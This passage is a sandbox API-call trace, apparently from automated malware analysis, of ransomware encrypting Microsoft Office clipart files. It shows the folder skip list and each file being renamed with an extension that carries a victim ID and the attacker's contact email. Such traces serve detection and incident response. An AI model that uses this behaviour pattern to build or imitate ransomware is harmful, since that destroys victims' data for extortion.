lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01221K.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01221K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0093.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0093.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01221k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.725] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7316) returned 1 [0093.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c90) returned 0x205850 [0093.725] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c90, lpOverlapped=0x0) returned 1 [0093.727] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.727] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c90, lpOverlapped=0x0) returned 1 [0093.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.727] CloseHandle (hObject=0x314) returned 1 [0093.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0093.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0093.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0093.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0093.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0093.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.728] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01221k.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01221k.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0093.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0093.728] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01235U.BMP", cAlternateFileName="")) returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2=".") returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="..") returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="...") returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="windows") returned -1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="recovery") returned -1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="perflogs") returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="documents and settings") returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="system volume information") returned -1 [0093.729] lstrcmpiW (lpString1="PH01235U.BMP", lpString2="msocache") returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0093.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01235U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01235U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01235U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01235U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01235U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01235U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.730] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0093.730] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0093.730] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0093.734] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.734] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0093.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.735] CloseHandle (hObject=0x314) returned 1 [0093.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0093.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0093.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0093.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0093.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0093.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0093.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.737] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01236U.BMP", cAlternateFileName="")) returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2=".") returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="..") returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="...") returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="windows") returned -1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="recovery") returned -1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="perflogs") returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="documents and settings") returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="system volume information") returned -1 [0093.737] lstrcmpiW (lpString1="PH01236U.BMP", lpString2="msocache") returned 1 [0093.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0093.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01236U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01236U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01236U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0093.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01236U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01236U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01236U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0093.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.738] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0093.738] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0093.739] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.742] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.743] CloseHandle (hObject=0x314) returned 1 [0093.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0093.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0093.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0093.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0093.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0093.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0093.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.745] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1764, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01239K.JPG", cAlternateFileName="")) returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2=".") returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="..") returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="...") returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="windows") returned -1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="recovery") returned -1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="perflogs") returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="documents and settings") returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="$RECYCLE.BIN") returned 1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="system volume information") returned -1 [0093.745] lstrcmpiW (lpString1="PH01239K.JPG", lpString2="msocache") returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0093.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01239K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01239K.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01239K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0093.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01239K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01239K.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01239K.JPG", lpUsedDefaultChar=0x0) returned 12 [0093.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0093.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0093.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.746] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5988) returned 1 [0093.746] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 